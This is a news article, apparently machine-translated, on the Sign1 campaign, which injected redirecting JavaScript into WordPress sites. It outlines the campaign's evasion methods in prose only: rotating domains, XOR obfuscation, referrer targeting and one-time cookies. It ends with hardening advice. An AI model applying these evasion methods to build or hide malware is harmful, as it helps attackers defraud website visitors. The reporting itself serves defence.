A campaign of malware previously unknown so-called Sign1 has infected more than 39,000 websites in the last six months. As a result, it caused unwanted redirects and pop-up ads for visitors.
Threat actors inject malware into custom HTML widgets and legitimate plugins on websites WordPress to insert the malicious Sign1 scripts instead of modifying the actual WordPress files.
Website security company Sucuri discovered the campaign after a client’s website began randomly displaying pop-up ads to visitors.
While Sucuri’s client was compromised through a brute force attack, Sucuri has not shared how the other detected sites were compromised.
However, based on previous attacks on WordPress, it likely involves a combination of brute force attacks and exploiting plugin vulnerabilities to gain access to the site.
Malware uses widgets and plugins
Once threat actors gain access, they use custom WordPress HTML widgets or, more commonly, install the legitimate Simple Custom CSS and JS plugin to inject malicious JavaScript code.
Sucuri’s analysis of Sign1 shows that the malware uses time-based randomization to generate dynamic URLs that change every 10 minutes to avoid blocking. Domains are registered shortly before they can be used in attacks, so they are not on any blocklist.
These URLs serve to fetch more malicious scripts that run in the visitor’s browser.
Initially, the domains were on Namecheap, but the attackers have now switched to HETZNER for hosting and Cloudflare for IP address obfuscation.
It is worth noting that the injected code presents XOR encoding and apparently random variable names, making detection by security tools more difficult.
The malicious code checks specific referrers and cookies before executing. Thus, it targets visitors from important websites like Google, Facebook, Yahoo It is Instagramand remaining dormant in other cases.
Additionally, the code creates a cookie in the target’s browser so that the pop-up is only displayed once per visitor. This makes reporting to the owner of the compromised site less likely.
Redirects
The script then redirects the visitor to scam sites such as fake captchas that try to trick you into enabling browser notifications. These notifications deliver unwanted advertisements directly to the operating system’s desktop.
Sucuri warns that Sign1 has evolved over the past six months, with infections increasing when a new version of the malware is released.
Over the past six months, Sucuri’s scanners have detected the malware on more than 39,000 websites, while the latest wave of attacks, which has been ongoing since January 2024, affected 2,500 websites.
The campaign has evolved over time to become more stealthy and resistant to blocking, which is a worrying development.
To protect your sites against these campaigns, use a strong/long admin password and update your plugins to the latest version. Additionally, unnecessary add-ons should be removed as they can serve as a potential attack surface.
Source: Atrevida
Earl Johnson is a music writer at Gossipify, known for his in-depth analysis and unique perspective on the industry. A graduate of USC with a degree in Music, he brings years of experience and passion to his writing. He covers the latest releases and trends, always on the lookout for the next big thing in music.
![Tomorrow we belong to: What awaits you in the episode of 1946, 1946, May 19, 2025 [SPOILERS]](https://fr.web.img3.acsta.net/img/57/e3/57e3079eff5f0a4878871c2512d436ee.jpg "Tomorrow we belong to: What awaits you in the episode of 1946, 1946, May 19, 2025 [SPOILERS]")
